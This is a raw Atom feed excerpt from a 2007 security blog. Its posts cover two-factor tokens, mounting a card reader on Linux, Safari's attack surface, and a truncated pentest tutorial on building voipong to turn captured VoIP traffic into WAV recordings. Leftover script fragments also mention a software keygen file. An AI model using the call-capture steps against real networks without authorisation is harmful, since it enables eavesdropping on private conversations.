&lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a href="http://www.olympusamerica.com/files/DWPUP4EN.zip"&gt;http://www.olympusamerica.com/files/DWPUP4EN.zip&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;"&gt;As the device is used in the field I will keep folks updated with its pros and cons.  If anyone else is using it or a similar device please leave a comment.&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-6508505260690969386?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/6508505260690969386/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=6508505260690969386&amp;isPopup=true' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/6508505260690969386'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/6508505260690969386'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/06/olympus-vn-2100pc-and-windows-vista.html' title='Olympus VN-2100PC and Windows Vista Ultimate'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Z4u4MkgQQuE/RnxepZ8RM6I/AAAAAAAAAAk/EruRD9rkCis/s72-c/VN-2100PC__m.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-8479535359948965633</id><published>2007-06-21T20:33:00.000-07:00</published><updated>2008-12-11T01:34:29.415-08:00</updated><title type='text'>PayPal and two factor authentication</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Z4u4MkgQQuE/Rnxfg58RM7I/AAAAAAAAAAs/mpWb1rhkO3o/s1600-h/1-15-07-paypalkey.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://3.bp.blogspot.com/_Z4u4MkgQQuE/Rnxfg58RM7I/AAAAAAAAAAs/mpWb1rhkO3o/s200/1-15-07-paypalkey.jpg" alt="" id="BLOGGER_PHOTO_ID_5079039498681136050" border="0" /&gt;&lt;/a&gt;&lt;span style="font-size:100%;"&gt;R&lt;span style="font-family: verdana;"&gt;eading the article below really got me to thinking this morning.  It sparked enough motivation for a blog post at least.&lt;/span&gt;&lt;/span&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a href="http://www.securityfocus.com/brief/528"&gt;http://www.securityfocus.com/brief/528&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;"&gt;&lt;span style="font-size:100%;"&gt;I've always been an advocate for multi factor authentication.  One of the main issues that I have with it is proper implementation.  When I used to work for a major telecommunications carrier many of the staff in the IT department were issued credit card sized RSA devices to be used as secondary authentication when accessing the network via VPN.  There were stringent rules as to where you could store it, that you couldn't loan it out or leave it lying about in plain view, etc.&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;"&gt;&lt;span style="font-size:100%;"&gt;On the other hand my girlfriend works for a local university in an accounting department.  All of the employees in her department have RSA key fobs for usage as second factor authentication when logging in to the network.  Well...while picking her up from work one evening I noticed that after she logged off she placed the key fob next to her keyboard.  Being security conscious (picture that!) I asked “Aren't you going to lock that in your drawer or take it with you?”.  She looked at me, smiled as if I were an idiot and matter of factly replied “Why would I do that?  Everyone here leaves theirs on the desk when they leave.”  Flabbergasted I walked to each workstation and checked, lo and behold at every workstation neatly placed to the left of the keyboard was an RSA key fob!&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;"&gt;&lt;span style="font-size:100%;"&gt;What does this story have to do with PayPal and the extra security measures they are attempting to employ?  Everything.  Two factor authentication doesn't do you much good if you don't take measures to ensure that the security it can provide you is not easily circumvented by poor security practices.  When not in use do not leave it on your desk while you go to the restroom or leave for the day.&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;"&gt;&lt;span style="font-size:100%;"&gt;The following post below also shows that two factor authentication is not fool proof nor a panacea.  You still need strong IT controls and policy in place.&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a href="http://neural-cybernetix.blogspot.com/2006/07/phishers-defeat-2-factor.html"&gt;http://neural-cybernetix.blogspot.com/2006/07/phishers-defeat-2-factor.html&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;"&gt;&lt;span style="font-size:100%;"&gt;On a side note I actually participated in the beta program and actually have one of the PayPal authentication devices.  It was inexpensive, very painless to setup and works well.  I keep it with me most of the time and when I don't I make certain that it is stored securely.&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-8479535359948965633?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/8479535359948965633/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=8479535359948965633&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8479535359948965633'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8479535359948965633'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/06/paypal-and-two-factor-authentication.html' title='PayPal and two factor authentication'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Z4u4MkgQQuE/Rnxfg58RM7I/AAAAAAAAAAs/mpWb1rhkO3o/s72-c/1-15-07-paypalkey.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-9180399976303144319</id><published>2007-06-18T19:49:00.000-07:00</published><updated>2008-12-11T01:34:29.612-08:00</updated><title type='text'>PQI Travel flash-Multi Slot Card R/W and Linux</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Z4u4MkgQQuE/Rnxf6J8RM8I/AAAAAAAAAA0/lJRJWrCaEVA/s1600-h/pqireader.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_Z4u4MkgQQuE/Rnxf6J8RM8I/AAAAAAAAAA0/lJRJWrCaEVA/s200/pqireader.jpg" alt="" id="BLOGGER_PHOTO_ID_5079039932472832962" border="0" /&gt;&lt;/a&gt;&lt;span style="font-family: verdana;font-size:100%;" &gt;I have one of these and needed to access an SD card to retreive some information from it via Slackware Linux.  The text below shows the steps I took to get this piece of hardware working correctly.&lt;br /&gt;&lt;br /&gt;First make sure that the card reader was even being picked up:&lt;br /&gt;&lt;br /&gt;igs-awilliams@IGS-LAP02:~&gt; less /proc/scsi/usb-storage-0/1 &lt;br /&gt;&lt;br /&gt;Host scsi1: usb-storage&lt;br /&gt;      Vendor: Generic&lt;br /&gt;     Product: USB Storage Device&lt;br /&gt;Serial Number: 0AEC305000001A002&lt;br /&gt;    Protocol: Transparent SCSI&lt;br /&gt;   Transport: Bulk&lt;br /&gt;        GUID: 0aec5010aec305000001a002&lt;br /&gt;    Attached: Yes&lt;br /&gt;&lt;br /&gt;Thats present so I can proceed.&lt;br /&gt;&lt;br /&gt;Under Linux these things are detected as SCSI devices do you have to&lt;br /&gt;accommodate the multiple devices.  Add the following to your lilo.conf:&lt;br /&gt;&lt;br /&gt;append = "max_scsi_luns=6"&lt;br /&gt;&lt;br /&gt;You will have to reboot after running lilo for the changes to take effect.&lt;br /&gt;&lt;br /&gt;Now once you have rebooted you can check what drives your system has available:&lt;br /&gt;&lt;br /&gt;igs-awilliams@IGS-LAP02:~&gt; sudo fdisk -l&lt;br /&gt;&lt;br /&gt;Disk /dev/sdc: 256 MB, 256901632 bytes&lt;br /&gt;8 heads, 62 sectors/track, 1011 cylinders&lt;br /&gt;Units = cylinders of 496 * 512 = 253952 bytes&lt;br /&gt;&lt;br /&gt;This doesn't look like a partition table&lt;br /&gt;Probably you selected the wrong device.&lt;br /&gt;&lt;br /&gt;  Device Boot      Start         End      Blocks   Id  System&lt;br /&gt;/dev/sdc1   ?     1568823     3870254   570754815+  72  Unknown&lt;br /&gt;Partition 1 has different physical/logical beginnings (non-Linux?):&lt;br /&gt;    phys=(357, 116, 40) logical=(1568822, 3, 11)&lt;br /&gt;Partition 1 has different physical/logical endings:&lt;br /&gt;    phys=(357, 32, 45) logical=(3870253, 0, 51)&lt;br /&gt;Partition 1 does not end on cylinder boundary.&lt;br /&gt;/dev/sdc2   ?      340100     4243383   968014120   65  Novell Netware 386&lt;br /&gt;Partition 2 has different physical/logical beginnings (non-Linux?):&lt;br /&gt;    phys=(288, 115, 43) logical=(340099, 6, 47)&lt;br /&gt;Partition 2 has different physical/logical endings:&lt;br /&gt;    phys=(367, 114, 50) logical=(4243382, 4, 42)&lt;br /&gt;Partition 2 does not end on cylinder boundary.&lt;br /&gt;/dev/sdc3   ?     3769923     7673205   968014096   79  Unknown&lt;br /&gt;Partition 3 has different physical/logical beginnings (non-Linux?):&lt;br /&gt;    phys=(366, 32, 33) logical=(3769922, 2, 30)&lt;br /&gt;Partition 3 has different physical/logical endings:&lt;br /&gt;    phys=(357, 32, 43) logical=(7673204, 7, 39)&lt;br /&gt;Partition 3 does not end on cylinder boundary.&lt;br /&gt;/dev/sdc4   ?     5817906     5818018       27749+   d  Unknown&lt;br /&gt;Partition 4 has different physical/logical beginnings (non-Linux?):&lt;br /&gt;    phys=(372, 97, 50) logical=(5817905, 4, 25)&lt;br /&gt;Partition 4 has different physical/logical endings:&lt;br /&gt;    phys=(0, 10, 0) logical=(5818017, 3, 33)&lt;br /&gt;Partition 4 does not end on cylinder boundary.&lt;br /&gt;&lt;br /&gt;Partition table entries are not in disk order&lt;br /&gt;This disk has both DOS and BSD magic.&lt;br /&gt;Give the 'b' command to go to BSD mode.&lt;br /&gt;&lt;br /&gt;Disk /dev/hda: 60.0 GB, 60011642880 bytes&lt;br /&gt;255 heads, 63 sectors/track, 7296 cylinders&lt;br /&gt;Units = cylinders of 16065 * 512 = 8225280 bytes&lt;br /&gt;&lt;br /&gt;  Device Boot      Start         End      Blocks   Id  System&lt;br /&gt;/dev/hda1   *           1        2197    17647371    7  HPFS/NTFS&lt;br /&gt;/dev/hda2            2198        5844    29294527+  83  Linux&lt;br /&gt;/dev/hda3            5845        5968      996030   82  Linux swap&lt;br /&gt;/dev/hda4            5969        7296    10667160   83  Linux&lt;br /&gt;&lt;br /&gt;Now its a matter of mounting the drive and verifying the contents:&lt;br /&gt;&lt;br /&gt;igs-awilliams@IGS-LAP02:~&gt; sudo mount -t vfat /dev/sdc4 /mnt/usbkey&lt;br /&gt;igs-awilliams@IGS-LAP02:~&gt; ls /mnt/usbkey&lt;br /&gt;FileThatIWanted.exe&lt;br /&gt;igs-awilliams@IGS-LAP02:~&gt; df -h /mnt/usbkey&lt;br /&gt;Filesystem            Size  Used Avail Use% Mounted on&lt;br /&gt;/dev/sdc4             245M   28M  217M  12% /mnt/usbkey&lt;br /&gt;&lt;br /&gt;There you have it.  If anyone has a better solution please feel free to post a comment.&lt;br /&gt;&lt;br /&gt;May Your Skill Prevail.&lt;br /&gt;&lt;/span&gt;&lt;script&gt;&lt;!-- D(["mb","Partition 2 has different physical/logical endings:\u003cbr /\&gt;     phys\u003d(367, 114, 50) logical\u003d(4243382, 4, 42)\u003cbr /\&gt;Partition 2 does not end on cylinder boundary.\u003cbr /\&gt;/dev/sdc3   ?     3769923     7673205   968014096   79  Unknown\u003cbr /\&gt;Partition 3 has different physical/logical beginnings (non-Linux?):\u003cbr /\&gt;     phys\u003d(366, 32, 33) logical\u003d(3769922, 2, 30)\u003cbr /\&gt;Partition 3 has different physical/logical endings:\u003cbr /\&gt;     phys\u003d(357, 32, 43) logical\u003d(7673204, 7, 39)\u003cbr /\&gt;Partition 3 does not end on cylinder boundary.\u003cbr /\&gt;/dev/sdc4   ?     5817906     5818018       27749+   d  Unknown\u003cbr /\&gt;Partition 4 has different physical/logical beginnings (non-Linux?):\u003cbr /\&gt;     phys\u003d(372, 97, 50) logical\u003d(5817905, 4, 25)\u003cbr /\&gt;Partition 4 has different physical/logical endings:\u003cbr /\&gt;     phys\u003d(0, 10, 0) logical\u003d(5818017, 3, 33)\u003cbr /\&gt;Partition 4 does not end on cylinder boundary.\u003cbr /\&gt;\u003cbr /\&gt;Partition table entries are not in disk order\u003cbr /\&gt;This disk has both DOS and BSD magic.\u003cbr /\&gt;Give the \'b\' command to go to BSD mode.\u003cbr /\&gt;\u003cbr /\&gt;Disk /dev/hda: 60.0 GB, 60011642880 bytes\u003cbr /\&gt;255 heads, 63 sectors/track, 7296 cylinders\u003cbr /\&gt;Units \u003d cylinders of 16065 * 512 \u003d 8225280 bytes\u003cbr /\&gt;\u003cbr /\&gt;   Device Boot      Start         End      Blocks   Id  System\u003cbr /\&gt;/dev/hda1   *           1        2197    17647371    7  HPFS/NTFS\u003cbr /\&gt;/dev/hda2            2198        5844    29294527+  83  Linux\u003cbr /\&gt;/dev/hda3            5845        5968      996030   82  Linux swap\u003cbr /\&gt;/dev/hda4            5969        7296    10667160   83  Linux\u003cbr /\&gt;\u003cbr /\&gt;Now its a matter of mounting the drive and verifying the contents:\u003cbr /\&gt;",1] );  //--&gt;&lt;/script&gt;&lt;script&gt;&lt;!-- D(["mb","\u003cbr /\&gt;sp00k@IGS-LAP02:~&gt; sudo mount -t vfat /dev/sdc4 /mnt/usbkey\u003cbr /\&gt;sp00k@IGS-LAP02:~&gt; ls /mnt/usbkey\u003cbr /\&gt;Nero \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://5.5.9.14\" target\u003d_blank\&gt;5.5.9.14\u003c/a\&gt; Full + All Plugins Updates + Serial Keygen.exe\u003cbr /\&gt;sp00k@IGS-LAP02:~&gt; df -h /mnt/usbkey\u003cbr /\&gt;Filesystem            Size  Used Avail Use% Mounted on\u003cbr /\&gt;/dev/sdc4             245M   28M  217M  12% /mnt/usbkey\u003cbr /\&gt;\u003cbr /\&gt;Unix ain\'t easy but somebody gotta do it!\u003cbr /\&gt;\u003c/div\&gt;",1] ); D(["mb","\u003cdiv style\u003d\"direction:ltr\"\&gt;\u003cspan class\u003dsg\&gt;\u003cbr /\&gt;--\u003cbr /\&gt;Anthony L. Williams\u003cbr /\&gt;Information Security Architect\u003cbr /\&gt;IRON::Guard Security, LLC \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.ironguard.net/\" target\u003d_blank\&gt;http://www.ironguard.net/\u003c/a\&gt;\u003cbr /\&gt;Pentesting::Assessments:\u003cwbr /\&gt;:Audits::Incident Response::Managed Security\u003cbr /\&gt;\u003c/span\&gt;\u003c/div\&gt;",0] );  //--&gt;&lt;/script&gt;&lt;br /&gt;&lt;script&gt;&lt;!-- D(["mb","Partition 2 has different physical/logical endings:\u003cbr /\&gt;     phys\u003d(367, 114, 50) logical\u003d(4243382, 4, 42)\u003cbr /\&gt;Partition 2 does not end on cylinder boundary.\u003cbr /\&gt;/dev/sdc3   ?     3769923     7673205   968014096   79  Unknown\u003cbr /\&gt;Partition 3 has different physical/logical beginnings (non-Linux?):\u003cbr /\&gt;     phys\u003d(366, 32, 33) logical\u003d(3769922, 2, 30)\u003cbr /\&gt;Partition 3 has different physical/logical endings:\u003cbr /\&gt;     phys\u003d(357, 32, 43) logical\u003d(7673204, 7, 39)\u003cbr /\&gt;Partition 3 does not end on cylinder boundary.\u003cbr /\&gt;/dev/sdc4   ?     5817906     5818018       27749+   d  Unknown\u003cbr /\&gt;Partition 4 has different physical/logical beginnings (non-Linux?):\u003cbr /\&gt;     phys\u003d(372, 97, 50) logical\u003d(5817905, 4, 25)\u003cbr /\&gt;Partition 4 has different physical/logical endings:\u003cbr /\&gt;     phys\u003d(0, 10, 0) logical\u003d(5818017, 3, 33)\u003cbr /\&gt;Partition 4 does not end on cylinder boundary.\u003cbr /\&gt;\u003cbr /\&gt;Partition table entries are not in disk order\u003cbr /\&gt;This disk has both DOS and BSD magic.\u003cbr /\&gt;Give the \'b\' command to go to BSD mode.\u003cbr /\&gt;\u003cbr /\&gt;Disk /dev/hda: 60.0 GB, 60011642880 bytes\u003cbr /\&gt;255 heads, 63 sectors/track, 7296 cylinders\u003cbr /\&gt;Units \u003d cylinders of 16065 * 512 \u003d 8225280 bytes\u003cbr /\&gt;\u003cbr /\&gt;   Device Boot      Start         End      Blocks   Id  System\u003cbr /\&gt;/dev/hda1   *           1        2197    17647371    7  HPFS/NTFS\u003cbr /\&gt;/dev/hda2            2198        5844    29294527+  83  Linux\u003cbr /\&gt;/dev/hda3            5845        5968      996030   82  Linux swap\u003cbr /\&gt;/dev/hda4            5969        7296    10667160   83  Linux\u003cbr /\&gt;\u003cbr /\&gt;Now its a matter of mounting the drive and verifying the contents:\u003cbr /\&gt;",1] );  //--&gt;&lt;/script&gt;&lt;script&gt;&lt;!-- D(["mb","\u003cbr /\&gt;sp00k@IGS-LAP02:~&gt; sudo mount -t vfat /dev/sdc4 /mnt/usbkey\u003cbr /\&gt;sp00k@IGS-LAP02:~&gt; ls /mnt/usbkey\u003cbr /\&gt;Nero \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://5.5.9.14\" target\u003d_blank\&gt;5.5.9.14\u003c/a\&gt; Full + All Plugins Updates + Serial Keygen.exe\u003cbr /\&gt;sp00k@IGS-LAP02:~&gt; df -h /mnt/usbkey\u003cbr /\&gt;Filesystem            Size  Used Avail Use% Mounted on\u003cbr /\&gt;/dev/sdc4             245M   28M  217M  12% /mnt/usbkey\u003cbr /\&gt;\u003cbr /\&gt;Unix ain\'t easy but somebody gotta do it!\u003cbr /\&gt;\u003c/div\&gt;",1] ); D(["mb","\u003cdiv style\u003d\"direction:ltr\"\&gt;\u003cspan class\u003dsg\&gt;\u003cbr /\&gt;--\u003cbr /\&gt;Anthony L. Williams\u003cbr /\&gt;Information Security Architect\u003cbr /\&gt;IRON::Guard Security, LLC \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.ironguard.net/\" target\u003d_blank\&gt;http://www.ironguard.net/\u003c/a\&gt;\u003cbr /\&gt;Pentesting::Assessments:\u003cwbr /\&gt;:Audits::Incident Response::Managed Security\u003cbr /\&gt;\u003c/span\&gt;\u003c/div\&gt;",0] );  //--&gt;&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-9180399976303144319?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/9180399976303144319/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=9180399976303144319&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/9180399976303144319'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/9180399976303144319'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/06/pqi-travel-flash-multi-slot-card-rw-and.html' title='PQI Travel flash-Multi Slot Card R/W and Linux'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Z4u4MkgQQuE/Rnxf6J8RM8I/AAAAAAAAAA0/lJRJWrCaEVA/s72-c/pqireader.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-4904279070680206044</id><published>2007-06-18T19:42:00.000-07:00</published><updated>2007-06-18T19:43:56.522-07:00</updated><title type='text'>Safari Browser Bugs, Attack Surfaces, Oh My!</title><content type='html'>&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 2.2  (Linux)"&gt;&lt;meta name="AUTHOR" content="igs-awilliams"&gt;&lt;meta name="CREATED" content="20070615;19402900"&gt;&lt;meta name="CHANGEDBY" content="igs-awilliams"&gt;&lt;meta name="CHANGED" content="20070617;20301100"&gt;              &lt;style type="text/css"&gt;  &lt;!--   @page { size: 8.5in 11in; margin: 0.79in }   P { margin-bottom: 0.08in }   H2 { margin-bottom: 0.08in }   H2.cjk { font-family: "DejaVu Sans" }   H2.ctl { font-family: "DejaVu Sans" }  --&gt;&lt;/style&gt;&lt;span style="font-family: verdana;font-size:100%;" &gt;Before anyone gets upset read the following, then if you have an opinion I would love to hear it.&lt;/span&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;color:#000080;"&gt;&lt;u&gt;&lt;a href="http://www.darkreading.com/blog.asp?blog_sectionid=415"&gt;http://www.darkreading.com/blog.asp?blog_sectionid=415&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;"&gt;This is to be expected.  I am not a Apple basher per say (Hey!  I have an iPod nano that I &lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;b&gt;love&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;) but it is a matter of exposure to threats.  Now that the source code for Safari has been exposed to a greater number of threats there will be more people poking and prodding at it and more vulnerabilities will be found.  This is to be expected regardless of the platform or application.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;"&gt;In a semi-related blog post over at Taosecurity that I read yesterday it was put very well.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;color:#000080;"&gt;&lt;u&gt;&lt;a href="http://taosecurity.blogspot.com/2007/06/triple-boot-thinkpad-x60s.html"&gt;http://taosecurity.blogspot.com/2007/06/triple-boot-thinkpad-x60s.html&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;"&gt;Richard Bejtlich says:&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;"&gt;“&lt;/span&gt;&lt;span style="font-size:100%;"&gt;Second, I am attending Black Hat this summer, and I don't trust Windows or Linux to that crowd. Sure, FreeBSD is "just as vulnerable" but the majority of the attackers will be looking for Windows and Linux users. Booting into FreeBSD and staying there will reduce my exposure surface.”&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family: verdana;"&gt;I totally agree with this statement.  Even with the risk of sounding like a broken record I will reiterate that regardless of platform or application there are vulnerabilities that can  .  I too will be attending Black Hat and Defcon and will take extra measures from an OS and application perspective to maintain as small an exposure surface as possible.&lt;/span&gt;  &lt;/span&gt; &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-4904279070680206044?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/4904279070680206044/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=4904279070680206044&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/4904279070680206044'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/4904279070680206044'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/06/safari-browser-bugs-attack-surfaces-oh.html' title='Safari Browser Bugs, Attack Surfaces, Oh My!'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-2644679941671443005</id><published>2007-06-17T20:34:00.001-07:00</published><updated>2007-06-17T21:12:39.453-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='voipong'/><category scheme='http://www.blogger.com/atom/ns#' term='tcpreplay'/><category scheme='http://www.blogger.com/atom/ns#' term='tcpdump'/><category scheme='http://www.blogger.com/atom/ns#' term='backtrack'/><title type='text'>Using voipong with Back|track 2 Final</title><content type='html'>&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:verdana;"&gt;In a recent engagement we had the oppurtunity to capture VOIP traffic using tcpdump to save the output to a libpcap formatted file.  After letting it run for a short time we saved the file and wanted to extract the contents and save them to a .WAV file available for playback.  The following will show you how to install the latest release of voipong into Back|track Final, use tcpreplay to playback the libpcap formatted file as network traffic and subsequently listen to the resulting .WAV file.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;First we must extract the voipong tarball:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;bt ~ # tar -zxpvf voipong-2.0.tar.gz&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Enter the voipong directory:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;bt ~ # cd voipong-2.0&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Prepare the proper Makefile for our platform:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;bt voipong-2.0 # cp Makefile.linux Makefile&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Issue the pair of commands to build and install voipong from source&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;bt voipong-2.0 # make&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;bt voipong-2.0 # make install&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;According to the INSTALL file we must also have sox installed to have voipong save files out to .WAV file from network traffic.  Let's verify that sox is indeed present on our system:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;bt voipong-2.0 # which sox&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;/usr/bin/sox&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;bt voipong-2.0 # which soxmix&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;/usr/bin/soxmix&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Now we must edit the voipong.conf file to instruct it where to find sox and soxmix.  In addition we must also change the entry as to what network adapter we will be using.  The default is em0, in our case we will be changing this to ath0.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;bt voipong-2.0 # nano /usr/local/etc/voipong/voipong.conf&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Now we can execute voipong, I have used the -f switch to force it to the foreground without daemonizing so we can see the output in real time.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;bt ~ # voipong -f&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;EnderUNIX VOIPONG Voice Over IP Sniffer starting...&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Release 2.0, running on bt [Linux 2.6.20-BT-PwnSauce-NOSMP #3 Sat Feb 24 15:52:59 GMT 2007 i686]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;(c) Murat Balaban http://www.enderunix.org/&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:32:33: 